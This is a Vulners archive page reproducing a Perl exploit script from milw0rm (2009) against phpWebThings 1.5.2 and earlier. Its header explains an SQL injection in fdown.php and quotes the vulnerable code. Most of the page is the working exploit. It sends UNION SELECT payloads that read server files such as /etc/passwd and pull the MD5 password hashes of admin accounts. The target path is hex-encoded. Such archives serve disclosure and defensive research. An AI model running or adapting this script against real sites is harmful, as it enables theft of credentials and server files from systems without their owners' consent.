Vulners
Lucene search
phpWebThings <= 1.5.2 MD5 Hash Retrieve/File Disclosure Exploit
#!/usr/bin/perl
###################################################################################################
# phpWebThings <= 1.5.2 MD5 Hash Retrieve / File Disclosure Remote Exploit #
# #
# by staker #
# ------------------------------ #
# mail: staker[at]hotmail[dot]it #
# url: http://phpwebthings.nl #
# ------------------------------ #
# #
# NOTE: #
# 1. it works regardless of php.ini settings #
# 2. wt_config.php contains mysql login #
# #
# short explanation: #
# ---------------------------------------------------- #
# phpWebThings contains a flaw that allows an attacker #
# to carry out an SQL injection attack. The issue is #
# due to the fdown.php script not properly sanitizing #
# user-supplied input to the 'id' variable. This may #
# allow an attacker to inject or manipulate #
# SQL queries in the backend database (php.ini indep) #
# ---------------------------------------------------- #
# #
# [file: fdown.php] #
# ------------------------------------ #
# #
# <?php #
# include_once("core/main.php"); #
# #
# $ret = db_query("select file from {$config["prefix"]}_forum_msgs where cod={$_REQUEST["id"]}"); #
# $row = db_fetch_array($ret); #
# header('HTTP/1.1 200 OK'); #
# header('Date: ' . date("D M j G:i:s T Y")); #
# header('Last-Modified: ' . date("D M j G:i:s T Y")); #
# header("Content-Type: application/force-download"); #
# header("Content-Lenght: " . (string)(filesize("var/forumfiles/{$row["file"]}"))); #
# header("Content-Transfer-Encoding: Binary"); #
# header("Content-Disposition: attachment; filename={$row["file"]}"); #
# readfile("var/forumfiles/{$row["file"]}"); #
# #
# ?> #
# #
# ------------------------------------- #
# #
# yeat@snippet:~/Desktop$ perl a.pl localhost/cms -c 1 #
# [*--------------------------------------------------------------------*] #
# [* phpWebThings <= 1.5.2 MD5 Hash Retrieve / File Disclosure Exploit *] #
# [*--------------------------------------------------------------------*] #
# [* Usage: perl web.pl [target + path] [OPTIONS] *] #
# [* *] #
# [* Options: *] #
# [* [files] -d ../../../../../../etc/passwd *] #
# [* [hash.] -c user_id *] #
# [* [table] -t set a table prefix (default: wt) *] #
# [*--------------------------------------------------------------------*] #
# [* MD5 Hash: f2c79ad3d1f03ba266dc0a85e1266671 #
# #
# ---------------------------------------------------------- #
# Today is: 12 June 2009 #
# Location: Italy,Turin. #
# http://www.youtube.com/watch?v=E78BGajeuAI&feature=related #
# ---------------------------------------------------------- #
###################################################################################################
use LWP::UserAgent;
use Getopt::Long;
&phpWebThings::init;
my ($files,$admin,$ua_lib,$domain,$table);
$domain = $ARGV[0] || exit(0);
$ua_lib = LWP::UserAgent->new(
timeout => 5,
max_redirect => 0,
agent => 'Mozilla/4.0 (compatible; Lotus-Notes/5.0; Windows-NT)',
) || die $!;
GetOptions(
'p=s' => \$proxy,
'd=s' => \$files,
'c=i' => \$admin,
't=s' => \$table,
);
die(&phpWebThings::Exploit);
sub phpWebThings::Exploit()
{
return Disclose::File($files) if defined $files;
return Retrieve::Hash($admin) if defined $admin;
}
sub Disclose::File
{
my $filename = $_[0] || die $!;
my $keywords = "\x2F\x66\x64\x6F\x77\x6E\x2E\x70\x68\x70";
my $response = $ua_lib->post(parse::URL($domain.$keywords),
[ id => "1/**/union/**/select/**/0x".Hex::convert($filename)."#" ]);
if ($response->status_line =~ /^(302|200|301)/) {
return $response->content;
}
else {
return $response->as_string;
}
}
sub Retrieve::Hash()
{
my $user_id = $_[0] || die $!;
my $keywords = "\x2F\x66\x64\x6F\x77\x6E\x2E\x70\x68\x70";
my $prefix = (defined $table) ? $table : 'wt';
my $response = $ua_lib->post(parse::URL($domain.$keywords),
[ id => "1 UNION SELECT password FROM ${prefix}_users WHERE uid=$user_id#" ]);
if ($response->status_line =~ /^(302|200|301)/)
{
if ($response->content =~ /([0-9a-f]{32})/) {
return "[* MD5 Hash: $1\n";
}
}
else {
return $response->as_string;
}
}
sub Hex::convert()
{
my $string = shift @_ || die $!;
return unpack("H*",$string);
}
sub parse::URL()
{
my $string = shift @_ || die($!);
if ($string !~ /^http:\/\/?/i) {
$string = 'http://'.$string;
}
return $string;
}
sub phpWebThings::init
{
print "[*--------------------------------------------------------------------*]\n".
"[* phpWebThings <= 1.5.2 MD5 Hash Retrieve / File Disclosure Exploit *]\n".
"[*--------------------------------------------------------------------*]\n".
"[* Usage: perl web.pl [target + path] [OPTIONS] *]\n".
"[* *]\n".
"[* Options: *]\n".
"[* [files] -d ../../../../../../etc/passwd *]\n".
"[* [hash.] -c user_id *]\n".
"[* [table] -t set a table prefix (default: wt) *]\n".
"[*--------------------------------------------------------------------*]\n";
}
# milw0rm.com [2009-06-12]
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1